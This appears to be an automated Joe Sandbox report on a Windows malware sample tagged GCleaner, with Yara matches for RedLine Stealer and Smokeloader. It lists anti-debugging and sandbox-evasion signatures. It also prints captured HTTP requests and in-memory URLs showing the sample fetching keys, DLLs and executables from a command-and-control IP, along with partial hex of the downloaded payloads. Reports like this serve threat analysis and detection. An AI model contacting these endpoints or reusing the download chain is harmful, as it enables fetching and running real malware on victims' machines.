Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WwVs3PavPg.exe

Overview

General Information

Sample name:	WwVs3PavPg.exe renamed because original name is a hash value
Original sample name:	4e341a5e65522dc7ad83bab52f3e60f8.exe
Analysis ID:	1578996
MD5:	4e341a5e65522dc7ad83bab52f3e60f8
SHA1:	d3a1d76710068d38cd35ed908c0677263f5d97e9
SHA256:	9afad313fdb3a41015ec415280986b4d596b1dc07bcc46b49f5bee6fcf5fb54c
Tags:	exeGCleaneruser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

×

Process Tree

System is w10x64

WwVs3PavPg.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\WwVs3PavPg.exe" MD5: 4E341A5E65522DC7AD83BAB52F3E60F8)

WerFault.exe (PID: 4780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3071582950.0000000000D39000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xf50:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WwVs3PavPg.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: WwVs3PavPg.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: WwVs3PavPg.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,		0_2_004034C0
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B43727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,		0_2_04B43727

Source: WwVs3PavPg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00415D07 FindFirstFileExW,		0_2_00415D07
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_10007EA9 FindFirstFileExW,		0_2_10007EA9
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B55F6E FindFirstFileExW,		0_2_04B55F6E

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 16:33:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 16:33:20 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: Joe Sandbox View

IP Address: 185.156.73.23 185.156.73.23

Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.73.23

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache

Source: WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/download
Source: WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/key
Source: WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005570000.00000004.00000020.00020000.00000000.sdmp, WwVs3PavPg.exe, 00000000.00000003.2893028114.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download
Source: WwVs3PavPg.exe, 00000000.00000003.2893028114.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download%
Source: WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadv
Source: WwVs3PavPg.exe, 00000000.00000002.3071636277.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/soft/download
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3071582950.0000000000D39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

Source: WwVs3PavPg.exe	Static PE information: section name:
Source: WwVs3PavPg.exe	Static PE information: section name: .idata
Source: WwVs3PavPg.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CF7CAA		0_3_04CF7CAA
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CE9D60		0_3_04CE9D60
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CEC7DD		0_3_04CEC7DD
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CF37F9		0_3_04CF37F9
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CF97F2		0_3_04CF97F2
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CEE720		0_3_04CEE720
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CF30E6		0_3_04CF30E6
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CE2070		0_3_04CE2070
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CF9912		0_3_04CF9912
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CECA0F		0_3_04CECA0F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00402C70		0_2_00402C70
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_004188AA		0_2_004188AA
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0040A960		0_2_0040A960
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0040F320		0_2_0040F320
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0040D3DD		0_2_0040D3DD
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0041A3F2		0_2_0041A3F2
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_004143F9		0_2_004143F9
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00413CE6		0_2_00413CE6
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0041A512		0_2_0041A512
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0040D60F		0_2_0040D60F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_1000E184		0_2_1000E184
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_100102A0		0_2_100102A0
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA4D67		0_2_00AA4D67
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00986CAE		0_2_00986CAE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00992AD9		0_2_00992AD9
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_009800CE		0_2_009800CE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_009850E2		0_2_009850E2
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0098E414		0_2_0098E414
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0098BE23		0_2_0098BE23
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00956C5D		0_2_00956C5D
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0097E5C0		0_2_0097E5C0
